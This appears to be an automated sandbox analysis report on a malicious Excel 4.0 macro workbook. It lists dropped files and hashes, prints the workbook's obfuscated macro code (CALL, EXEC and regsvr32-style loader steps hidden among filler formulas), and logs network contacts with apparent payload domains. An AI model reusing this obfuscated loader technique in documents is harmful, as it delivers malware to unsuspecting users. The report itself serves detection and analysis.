                                                                  C:\Users\user\AppData\Local\Temp\CabE15B.tmp
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):59863
                                                                  Entropy (8bit):7.99556910241083
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                  MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                  SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                  SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                  SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                  C:\Users\user\AppData\Local\Temp\TarE15C.tmp
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):156386
                                                                  Entropy (8bit):6.3086528024913715
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                                                                  MD5:78CABD9F1AFFF17BB91A105CF4702188
                                                                  SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                                                                  SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                                                                  SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0b31c0f0_by_Libranalysis.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 02:52:28 2021, mtime=Thu May 13 02:52:40 2021, atime=Thu May 13 02:52:40 2021, length=174080, window=hide
Category: dropped
Size (bytes): 2168
Entropy (8bit): 4.549572241967691
Encrypted: false
SSDEEP: 48:8w/XT0jX3OE+xNV3OE6RMQh2w/XT0jX3OE+xNV3OE6RMQ/:8w/XojX3F0NV3F6RMQh2w/XojX3F0NVm
MD5: 900D4F95AF0F75EBE0168A64D97FCC1B
SHA1: 1B9D4CA04B971AD14CC6C4785EC16BD3FB55FD08
SHA-256: 7BF650D900BAF523B023206282609BCC4F5440AAE2A18469686B37D00EBFDB7A
SHA-512: D53E625F3DC6154FBDE51C54601E314CBBC71A6B24F05893D04821201835EE38806A29F509C1C25B57A6A9C5B9A601223F8415C2654BCFDB454936AE59DEB6D1
Malicious: false
                                                                  Preview: L..................F.... ....std.G..tx.k.G..7F.k.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .0B31C0~1.XLS..f......R...R..*...9&....................0.b.3.1.c.0.f.0._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\0b31c0f0_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.b.3.1.c.0.f.0._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 02:52:40 2021, atime=Thu May 13 02:52:40 2021, length=16384, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.4897223892876905
Encrypted: false
SSDEEP: 12:85QDLgXg/XAlCPCHaXtB8XzB/EYUX+WnicvbASbDtZ3YilMMEpxRljKQgTdJP9TK:85E/XTd6j0YeM+Dv3qRMrNru/
MD5: F3B2D815292458A7276395A073B5245D
SHA1: 23DD825DCEFE3EF789825CCD45649329773F1915
SHA-256: 79C7C675597408D1EC8E3314AFBEA616D314F45DE2E88F0421C81EB05D1B7CD7
SHA-512: A28FC149B8C54FF3574D009893FF4B63AF5C9B78493EBA80E10C5FD7C98B4CEAAC4CECF5E9EDE179E7624188158AC3223DB1258FDE3CDCE84430B2D8E673B03E
Malicious: false
                                                                  Preview: L..................F...........7G..tx.k.G..tx.k.G...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 125
Entropy (8bit): 4.597676554025461
Encrypted: false
SSDEEP: 3:oyBVomMNHO+GUwSLMp6lFC+GUwSLMp6lmMNHO+GUwSLMp6lv:dj6N5hNVVhNbN5hNf
MD5: 8265981D753FAFBF43275468E7E2188B
SHA1: 12D72C6725B36C6BC9B3FAD7166293AED58A11F4
SHA-256: 6FBFBA861DCD4F88342B62440ED0495047947AEC1CD6FE79676305FCEED256E3
SHA-512: 71DCCF6B7DA80459B1EE4919C43D1F0C28191666DE740EE35BA0DB80537E0EA327081CD34937189E61987D09DFB7110E73C6F4597FB4E07664158EB1E448E5EA
Malicious: false
                                                                  Preview: Desktop.LNK=0..[xls]..0b31c0f0_by_Libranalysis.LNK=0..0b31c0f0_by_Libranalysis.LNK=0..[xls]..0b31c0f0_by_Libranalysis.LNK=0..
C:\Users\user\Desktop\97DE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Applesoft BASIC program data, first line number 16
Category: dropped
Size (bytes): 205059
Entropy (8bit): 5.644179363118584
Encrypted: false
SSDEEP: 3072:3l8ibbSD8YNoTU90f0oPzn3buX7vrPlsrXvLp0nLIl8i5U:rbbTrTU9eTv5U
MD5: A80675B1648FE2F61AA46F36AC713FFC
SHA1: D2C04BF993706FBF9BBB27D880B0828ED0206F25
SHA-256: C6BF7129680C5A4944CFC52A06983AAD8F2C3BE55F56EF8DA49B7407D45A2C72
SHA-512: 5838C7C56A4B1B6F09565FC2E88176AC387DC9B9AE33798D3DF56FDC83375085B2000B0BC27574B34F419954124A8EB3AF623E42A9D0876D9941C2EF2AEC5C08
Malicious: false
                                                                  Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
Entropy (8bit): 3.258986427712615
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: 0b31c0f0_by_Libranalysis.xls
File size: 375808
MD5: 0b31c0f0844b5541f94f915757c4ba61
SHA1: 4be1acd410a4e696278657309cd4de7874055991
SHA256: d59102c1a562711ef640e8e278477d0b7fd460667a9e8cf20b44603cc594999a
SHA512: ec81f13553214ec8706748c94d51b20db51ae1d01981370b395f8f651173bc8136264d818ff1eb659a6d7fcbf954d4c58be331380694cf898d796dceb618e269
SSDEEP: 3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcN:vUGAt6Uqa5DPdG9uS9QLp4l+s+Y8
                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

File Icon

Icon Hash: e4eea286a4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "0b31c0f0_by_Libranalysis.xls"

Indicators

Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1251
Author: van-van
Last Saved By: vi-vi
Create Time: 2006-09-16 00:00:00
Last Saved Time: 2021-05-12 07:24:11
Creating Application: Microsoft Excel
Security: 0

Document Summary

Document Code Page: 1251
Thumbnail Scaling Desired: False
Contains Dirty Links: False

                                                                  Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.287037498961
Base64 Encoded: False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.290777742057
Base64 Encoded: False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
General
Stream Path: Book
File Type: Applesoft BASIC program data, first line number 8
Stream Size: 363283
Entropy: 3.24522262131
Base64 Encoded: True
                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                  Macro 4.0 Code

                                                                  CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                  
                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT
(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&befo
re.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                  "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                  "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
May 12, 2021 20:52:34.700290918 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:34.859972000 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:34.860167980 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:34.875341892 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:35.034025908 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:35.047511101 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:35.047548056 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:35.047568083 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:35.047729969 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:35.093641043 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:35.261606932 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:35.261755943 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:36.869930983 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:37.070472956 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:37.201122999 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:37.201283932 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:37.201421976 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:37.201442957 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:37.202375889 CEST  49165        443        192.168.2.22    192.185.39.58
May 12, 2021 20:52:37.279437065 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:37.362838984 CEST  443          49165      192.185.39.58   192.168.2.22
May 12, 2021 20:52:37.441329956 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:37.441457987 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:37.442059994 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:37.606080055 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:37.619582891 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:37.619632006 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:37.619661093 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:37.619822025 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:37.665781975 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:37.839745045 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:37.839929104 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:37.879363060 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:38.081314087 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:38.444132090 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:38.444328070 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:52:38.445065975 CEST  443          49168      192.185.32.232  192.168.2.22
May 12, 2021 20:52:38.445167065 CEST  49168        443        192.168.2.22    192.185.32.232
May 12, 2021 20:53:08.445360899 CEST  443          49168      192.185.32.232  192.168.2.22

                                                                  UDP Packets

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
May 12, 2021 20:52:34.498296022 CEST  52197        53         192.168.2.22  8.8.8.8
May 12, 2021 20:52:34.683665037 CEST  53           52197      8.8.8.8       192.168.2.22
May 12, 2021 20:52:35.631356001 CEST  53099        53         192.168.2.22  8.8.8.8
May 12, 2021 20:52:35.681977034 CEST  53           53099      8.8.8.8       192.168.2.22
May 12, 2021 20:52:35.689065933 CEST  52838        53         192.168.2.22  8.8.8.8
May 12, 2021 20:52:35.737957001 CEST  53           52838      8.8.8.8       192.168.2.22
May 12, 2021 20:52:36.288023949 CEST  61200        53         192.168.2.22  8.8.8.8
May 12, 2021 20:52:36.345499992 CEST  53           61200      8.8.8.8       192.168.2.22
May 12, 2021 20:52:36.352636099 CEST  49548        53         192.168.2.22  8.8.8.8
May 12, 2021 20:52:36.404714108 CEST  53           49548      8.8.8.8       192.168.2.22
May 12, 2021 20:52:37.214313030 CEST  55627        53         192.168.2.22  8.8.8.8
May 12, 2021 20:52:37.276567936 CEST  53           55627      8.8.8.8       192.168.2.22

                                                                  DNS Queries

Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                   Type            Class
May 12, 2021 20:52:34.498296022 CEST  192.168.2.22  8.8.8.8  0xd372    Standard query (0)  signifysystem.com      A (IP address)  IN (0x0001)
May 12, 2021 20:52:37.214313030 CEST  192.168.2.22  8.8.8.8  0xd7b1    Standard query (0)  fcventasyservicios.cl  A (IP address)  IN (0x0001)

                                                                  DNS Answers

Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                   CName  Address         Type            Class
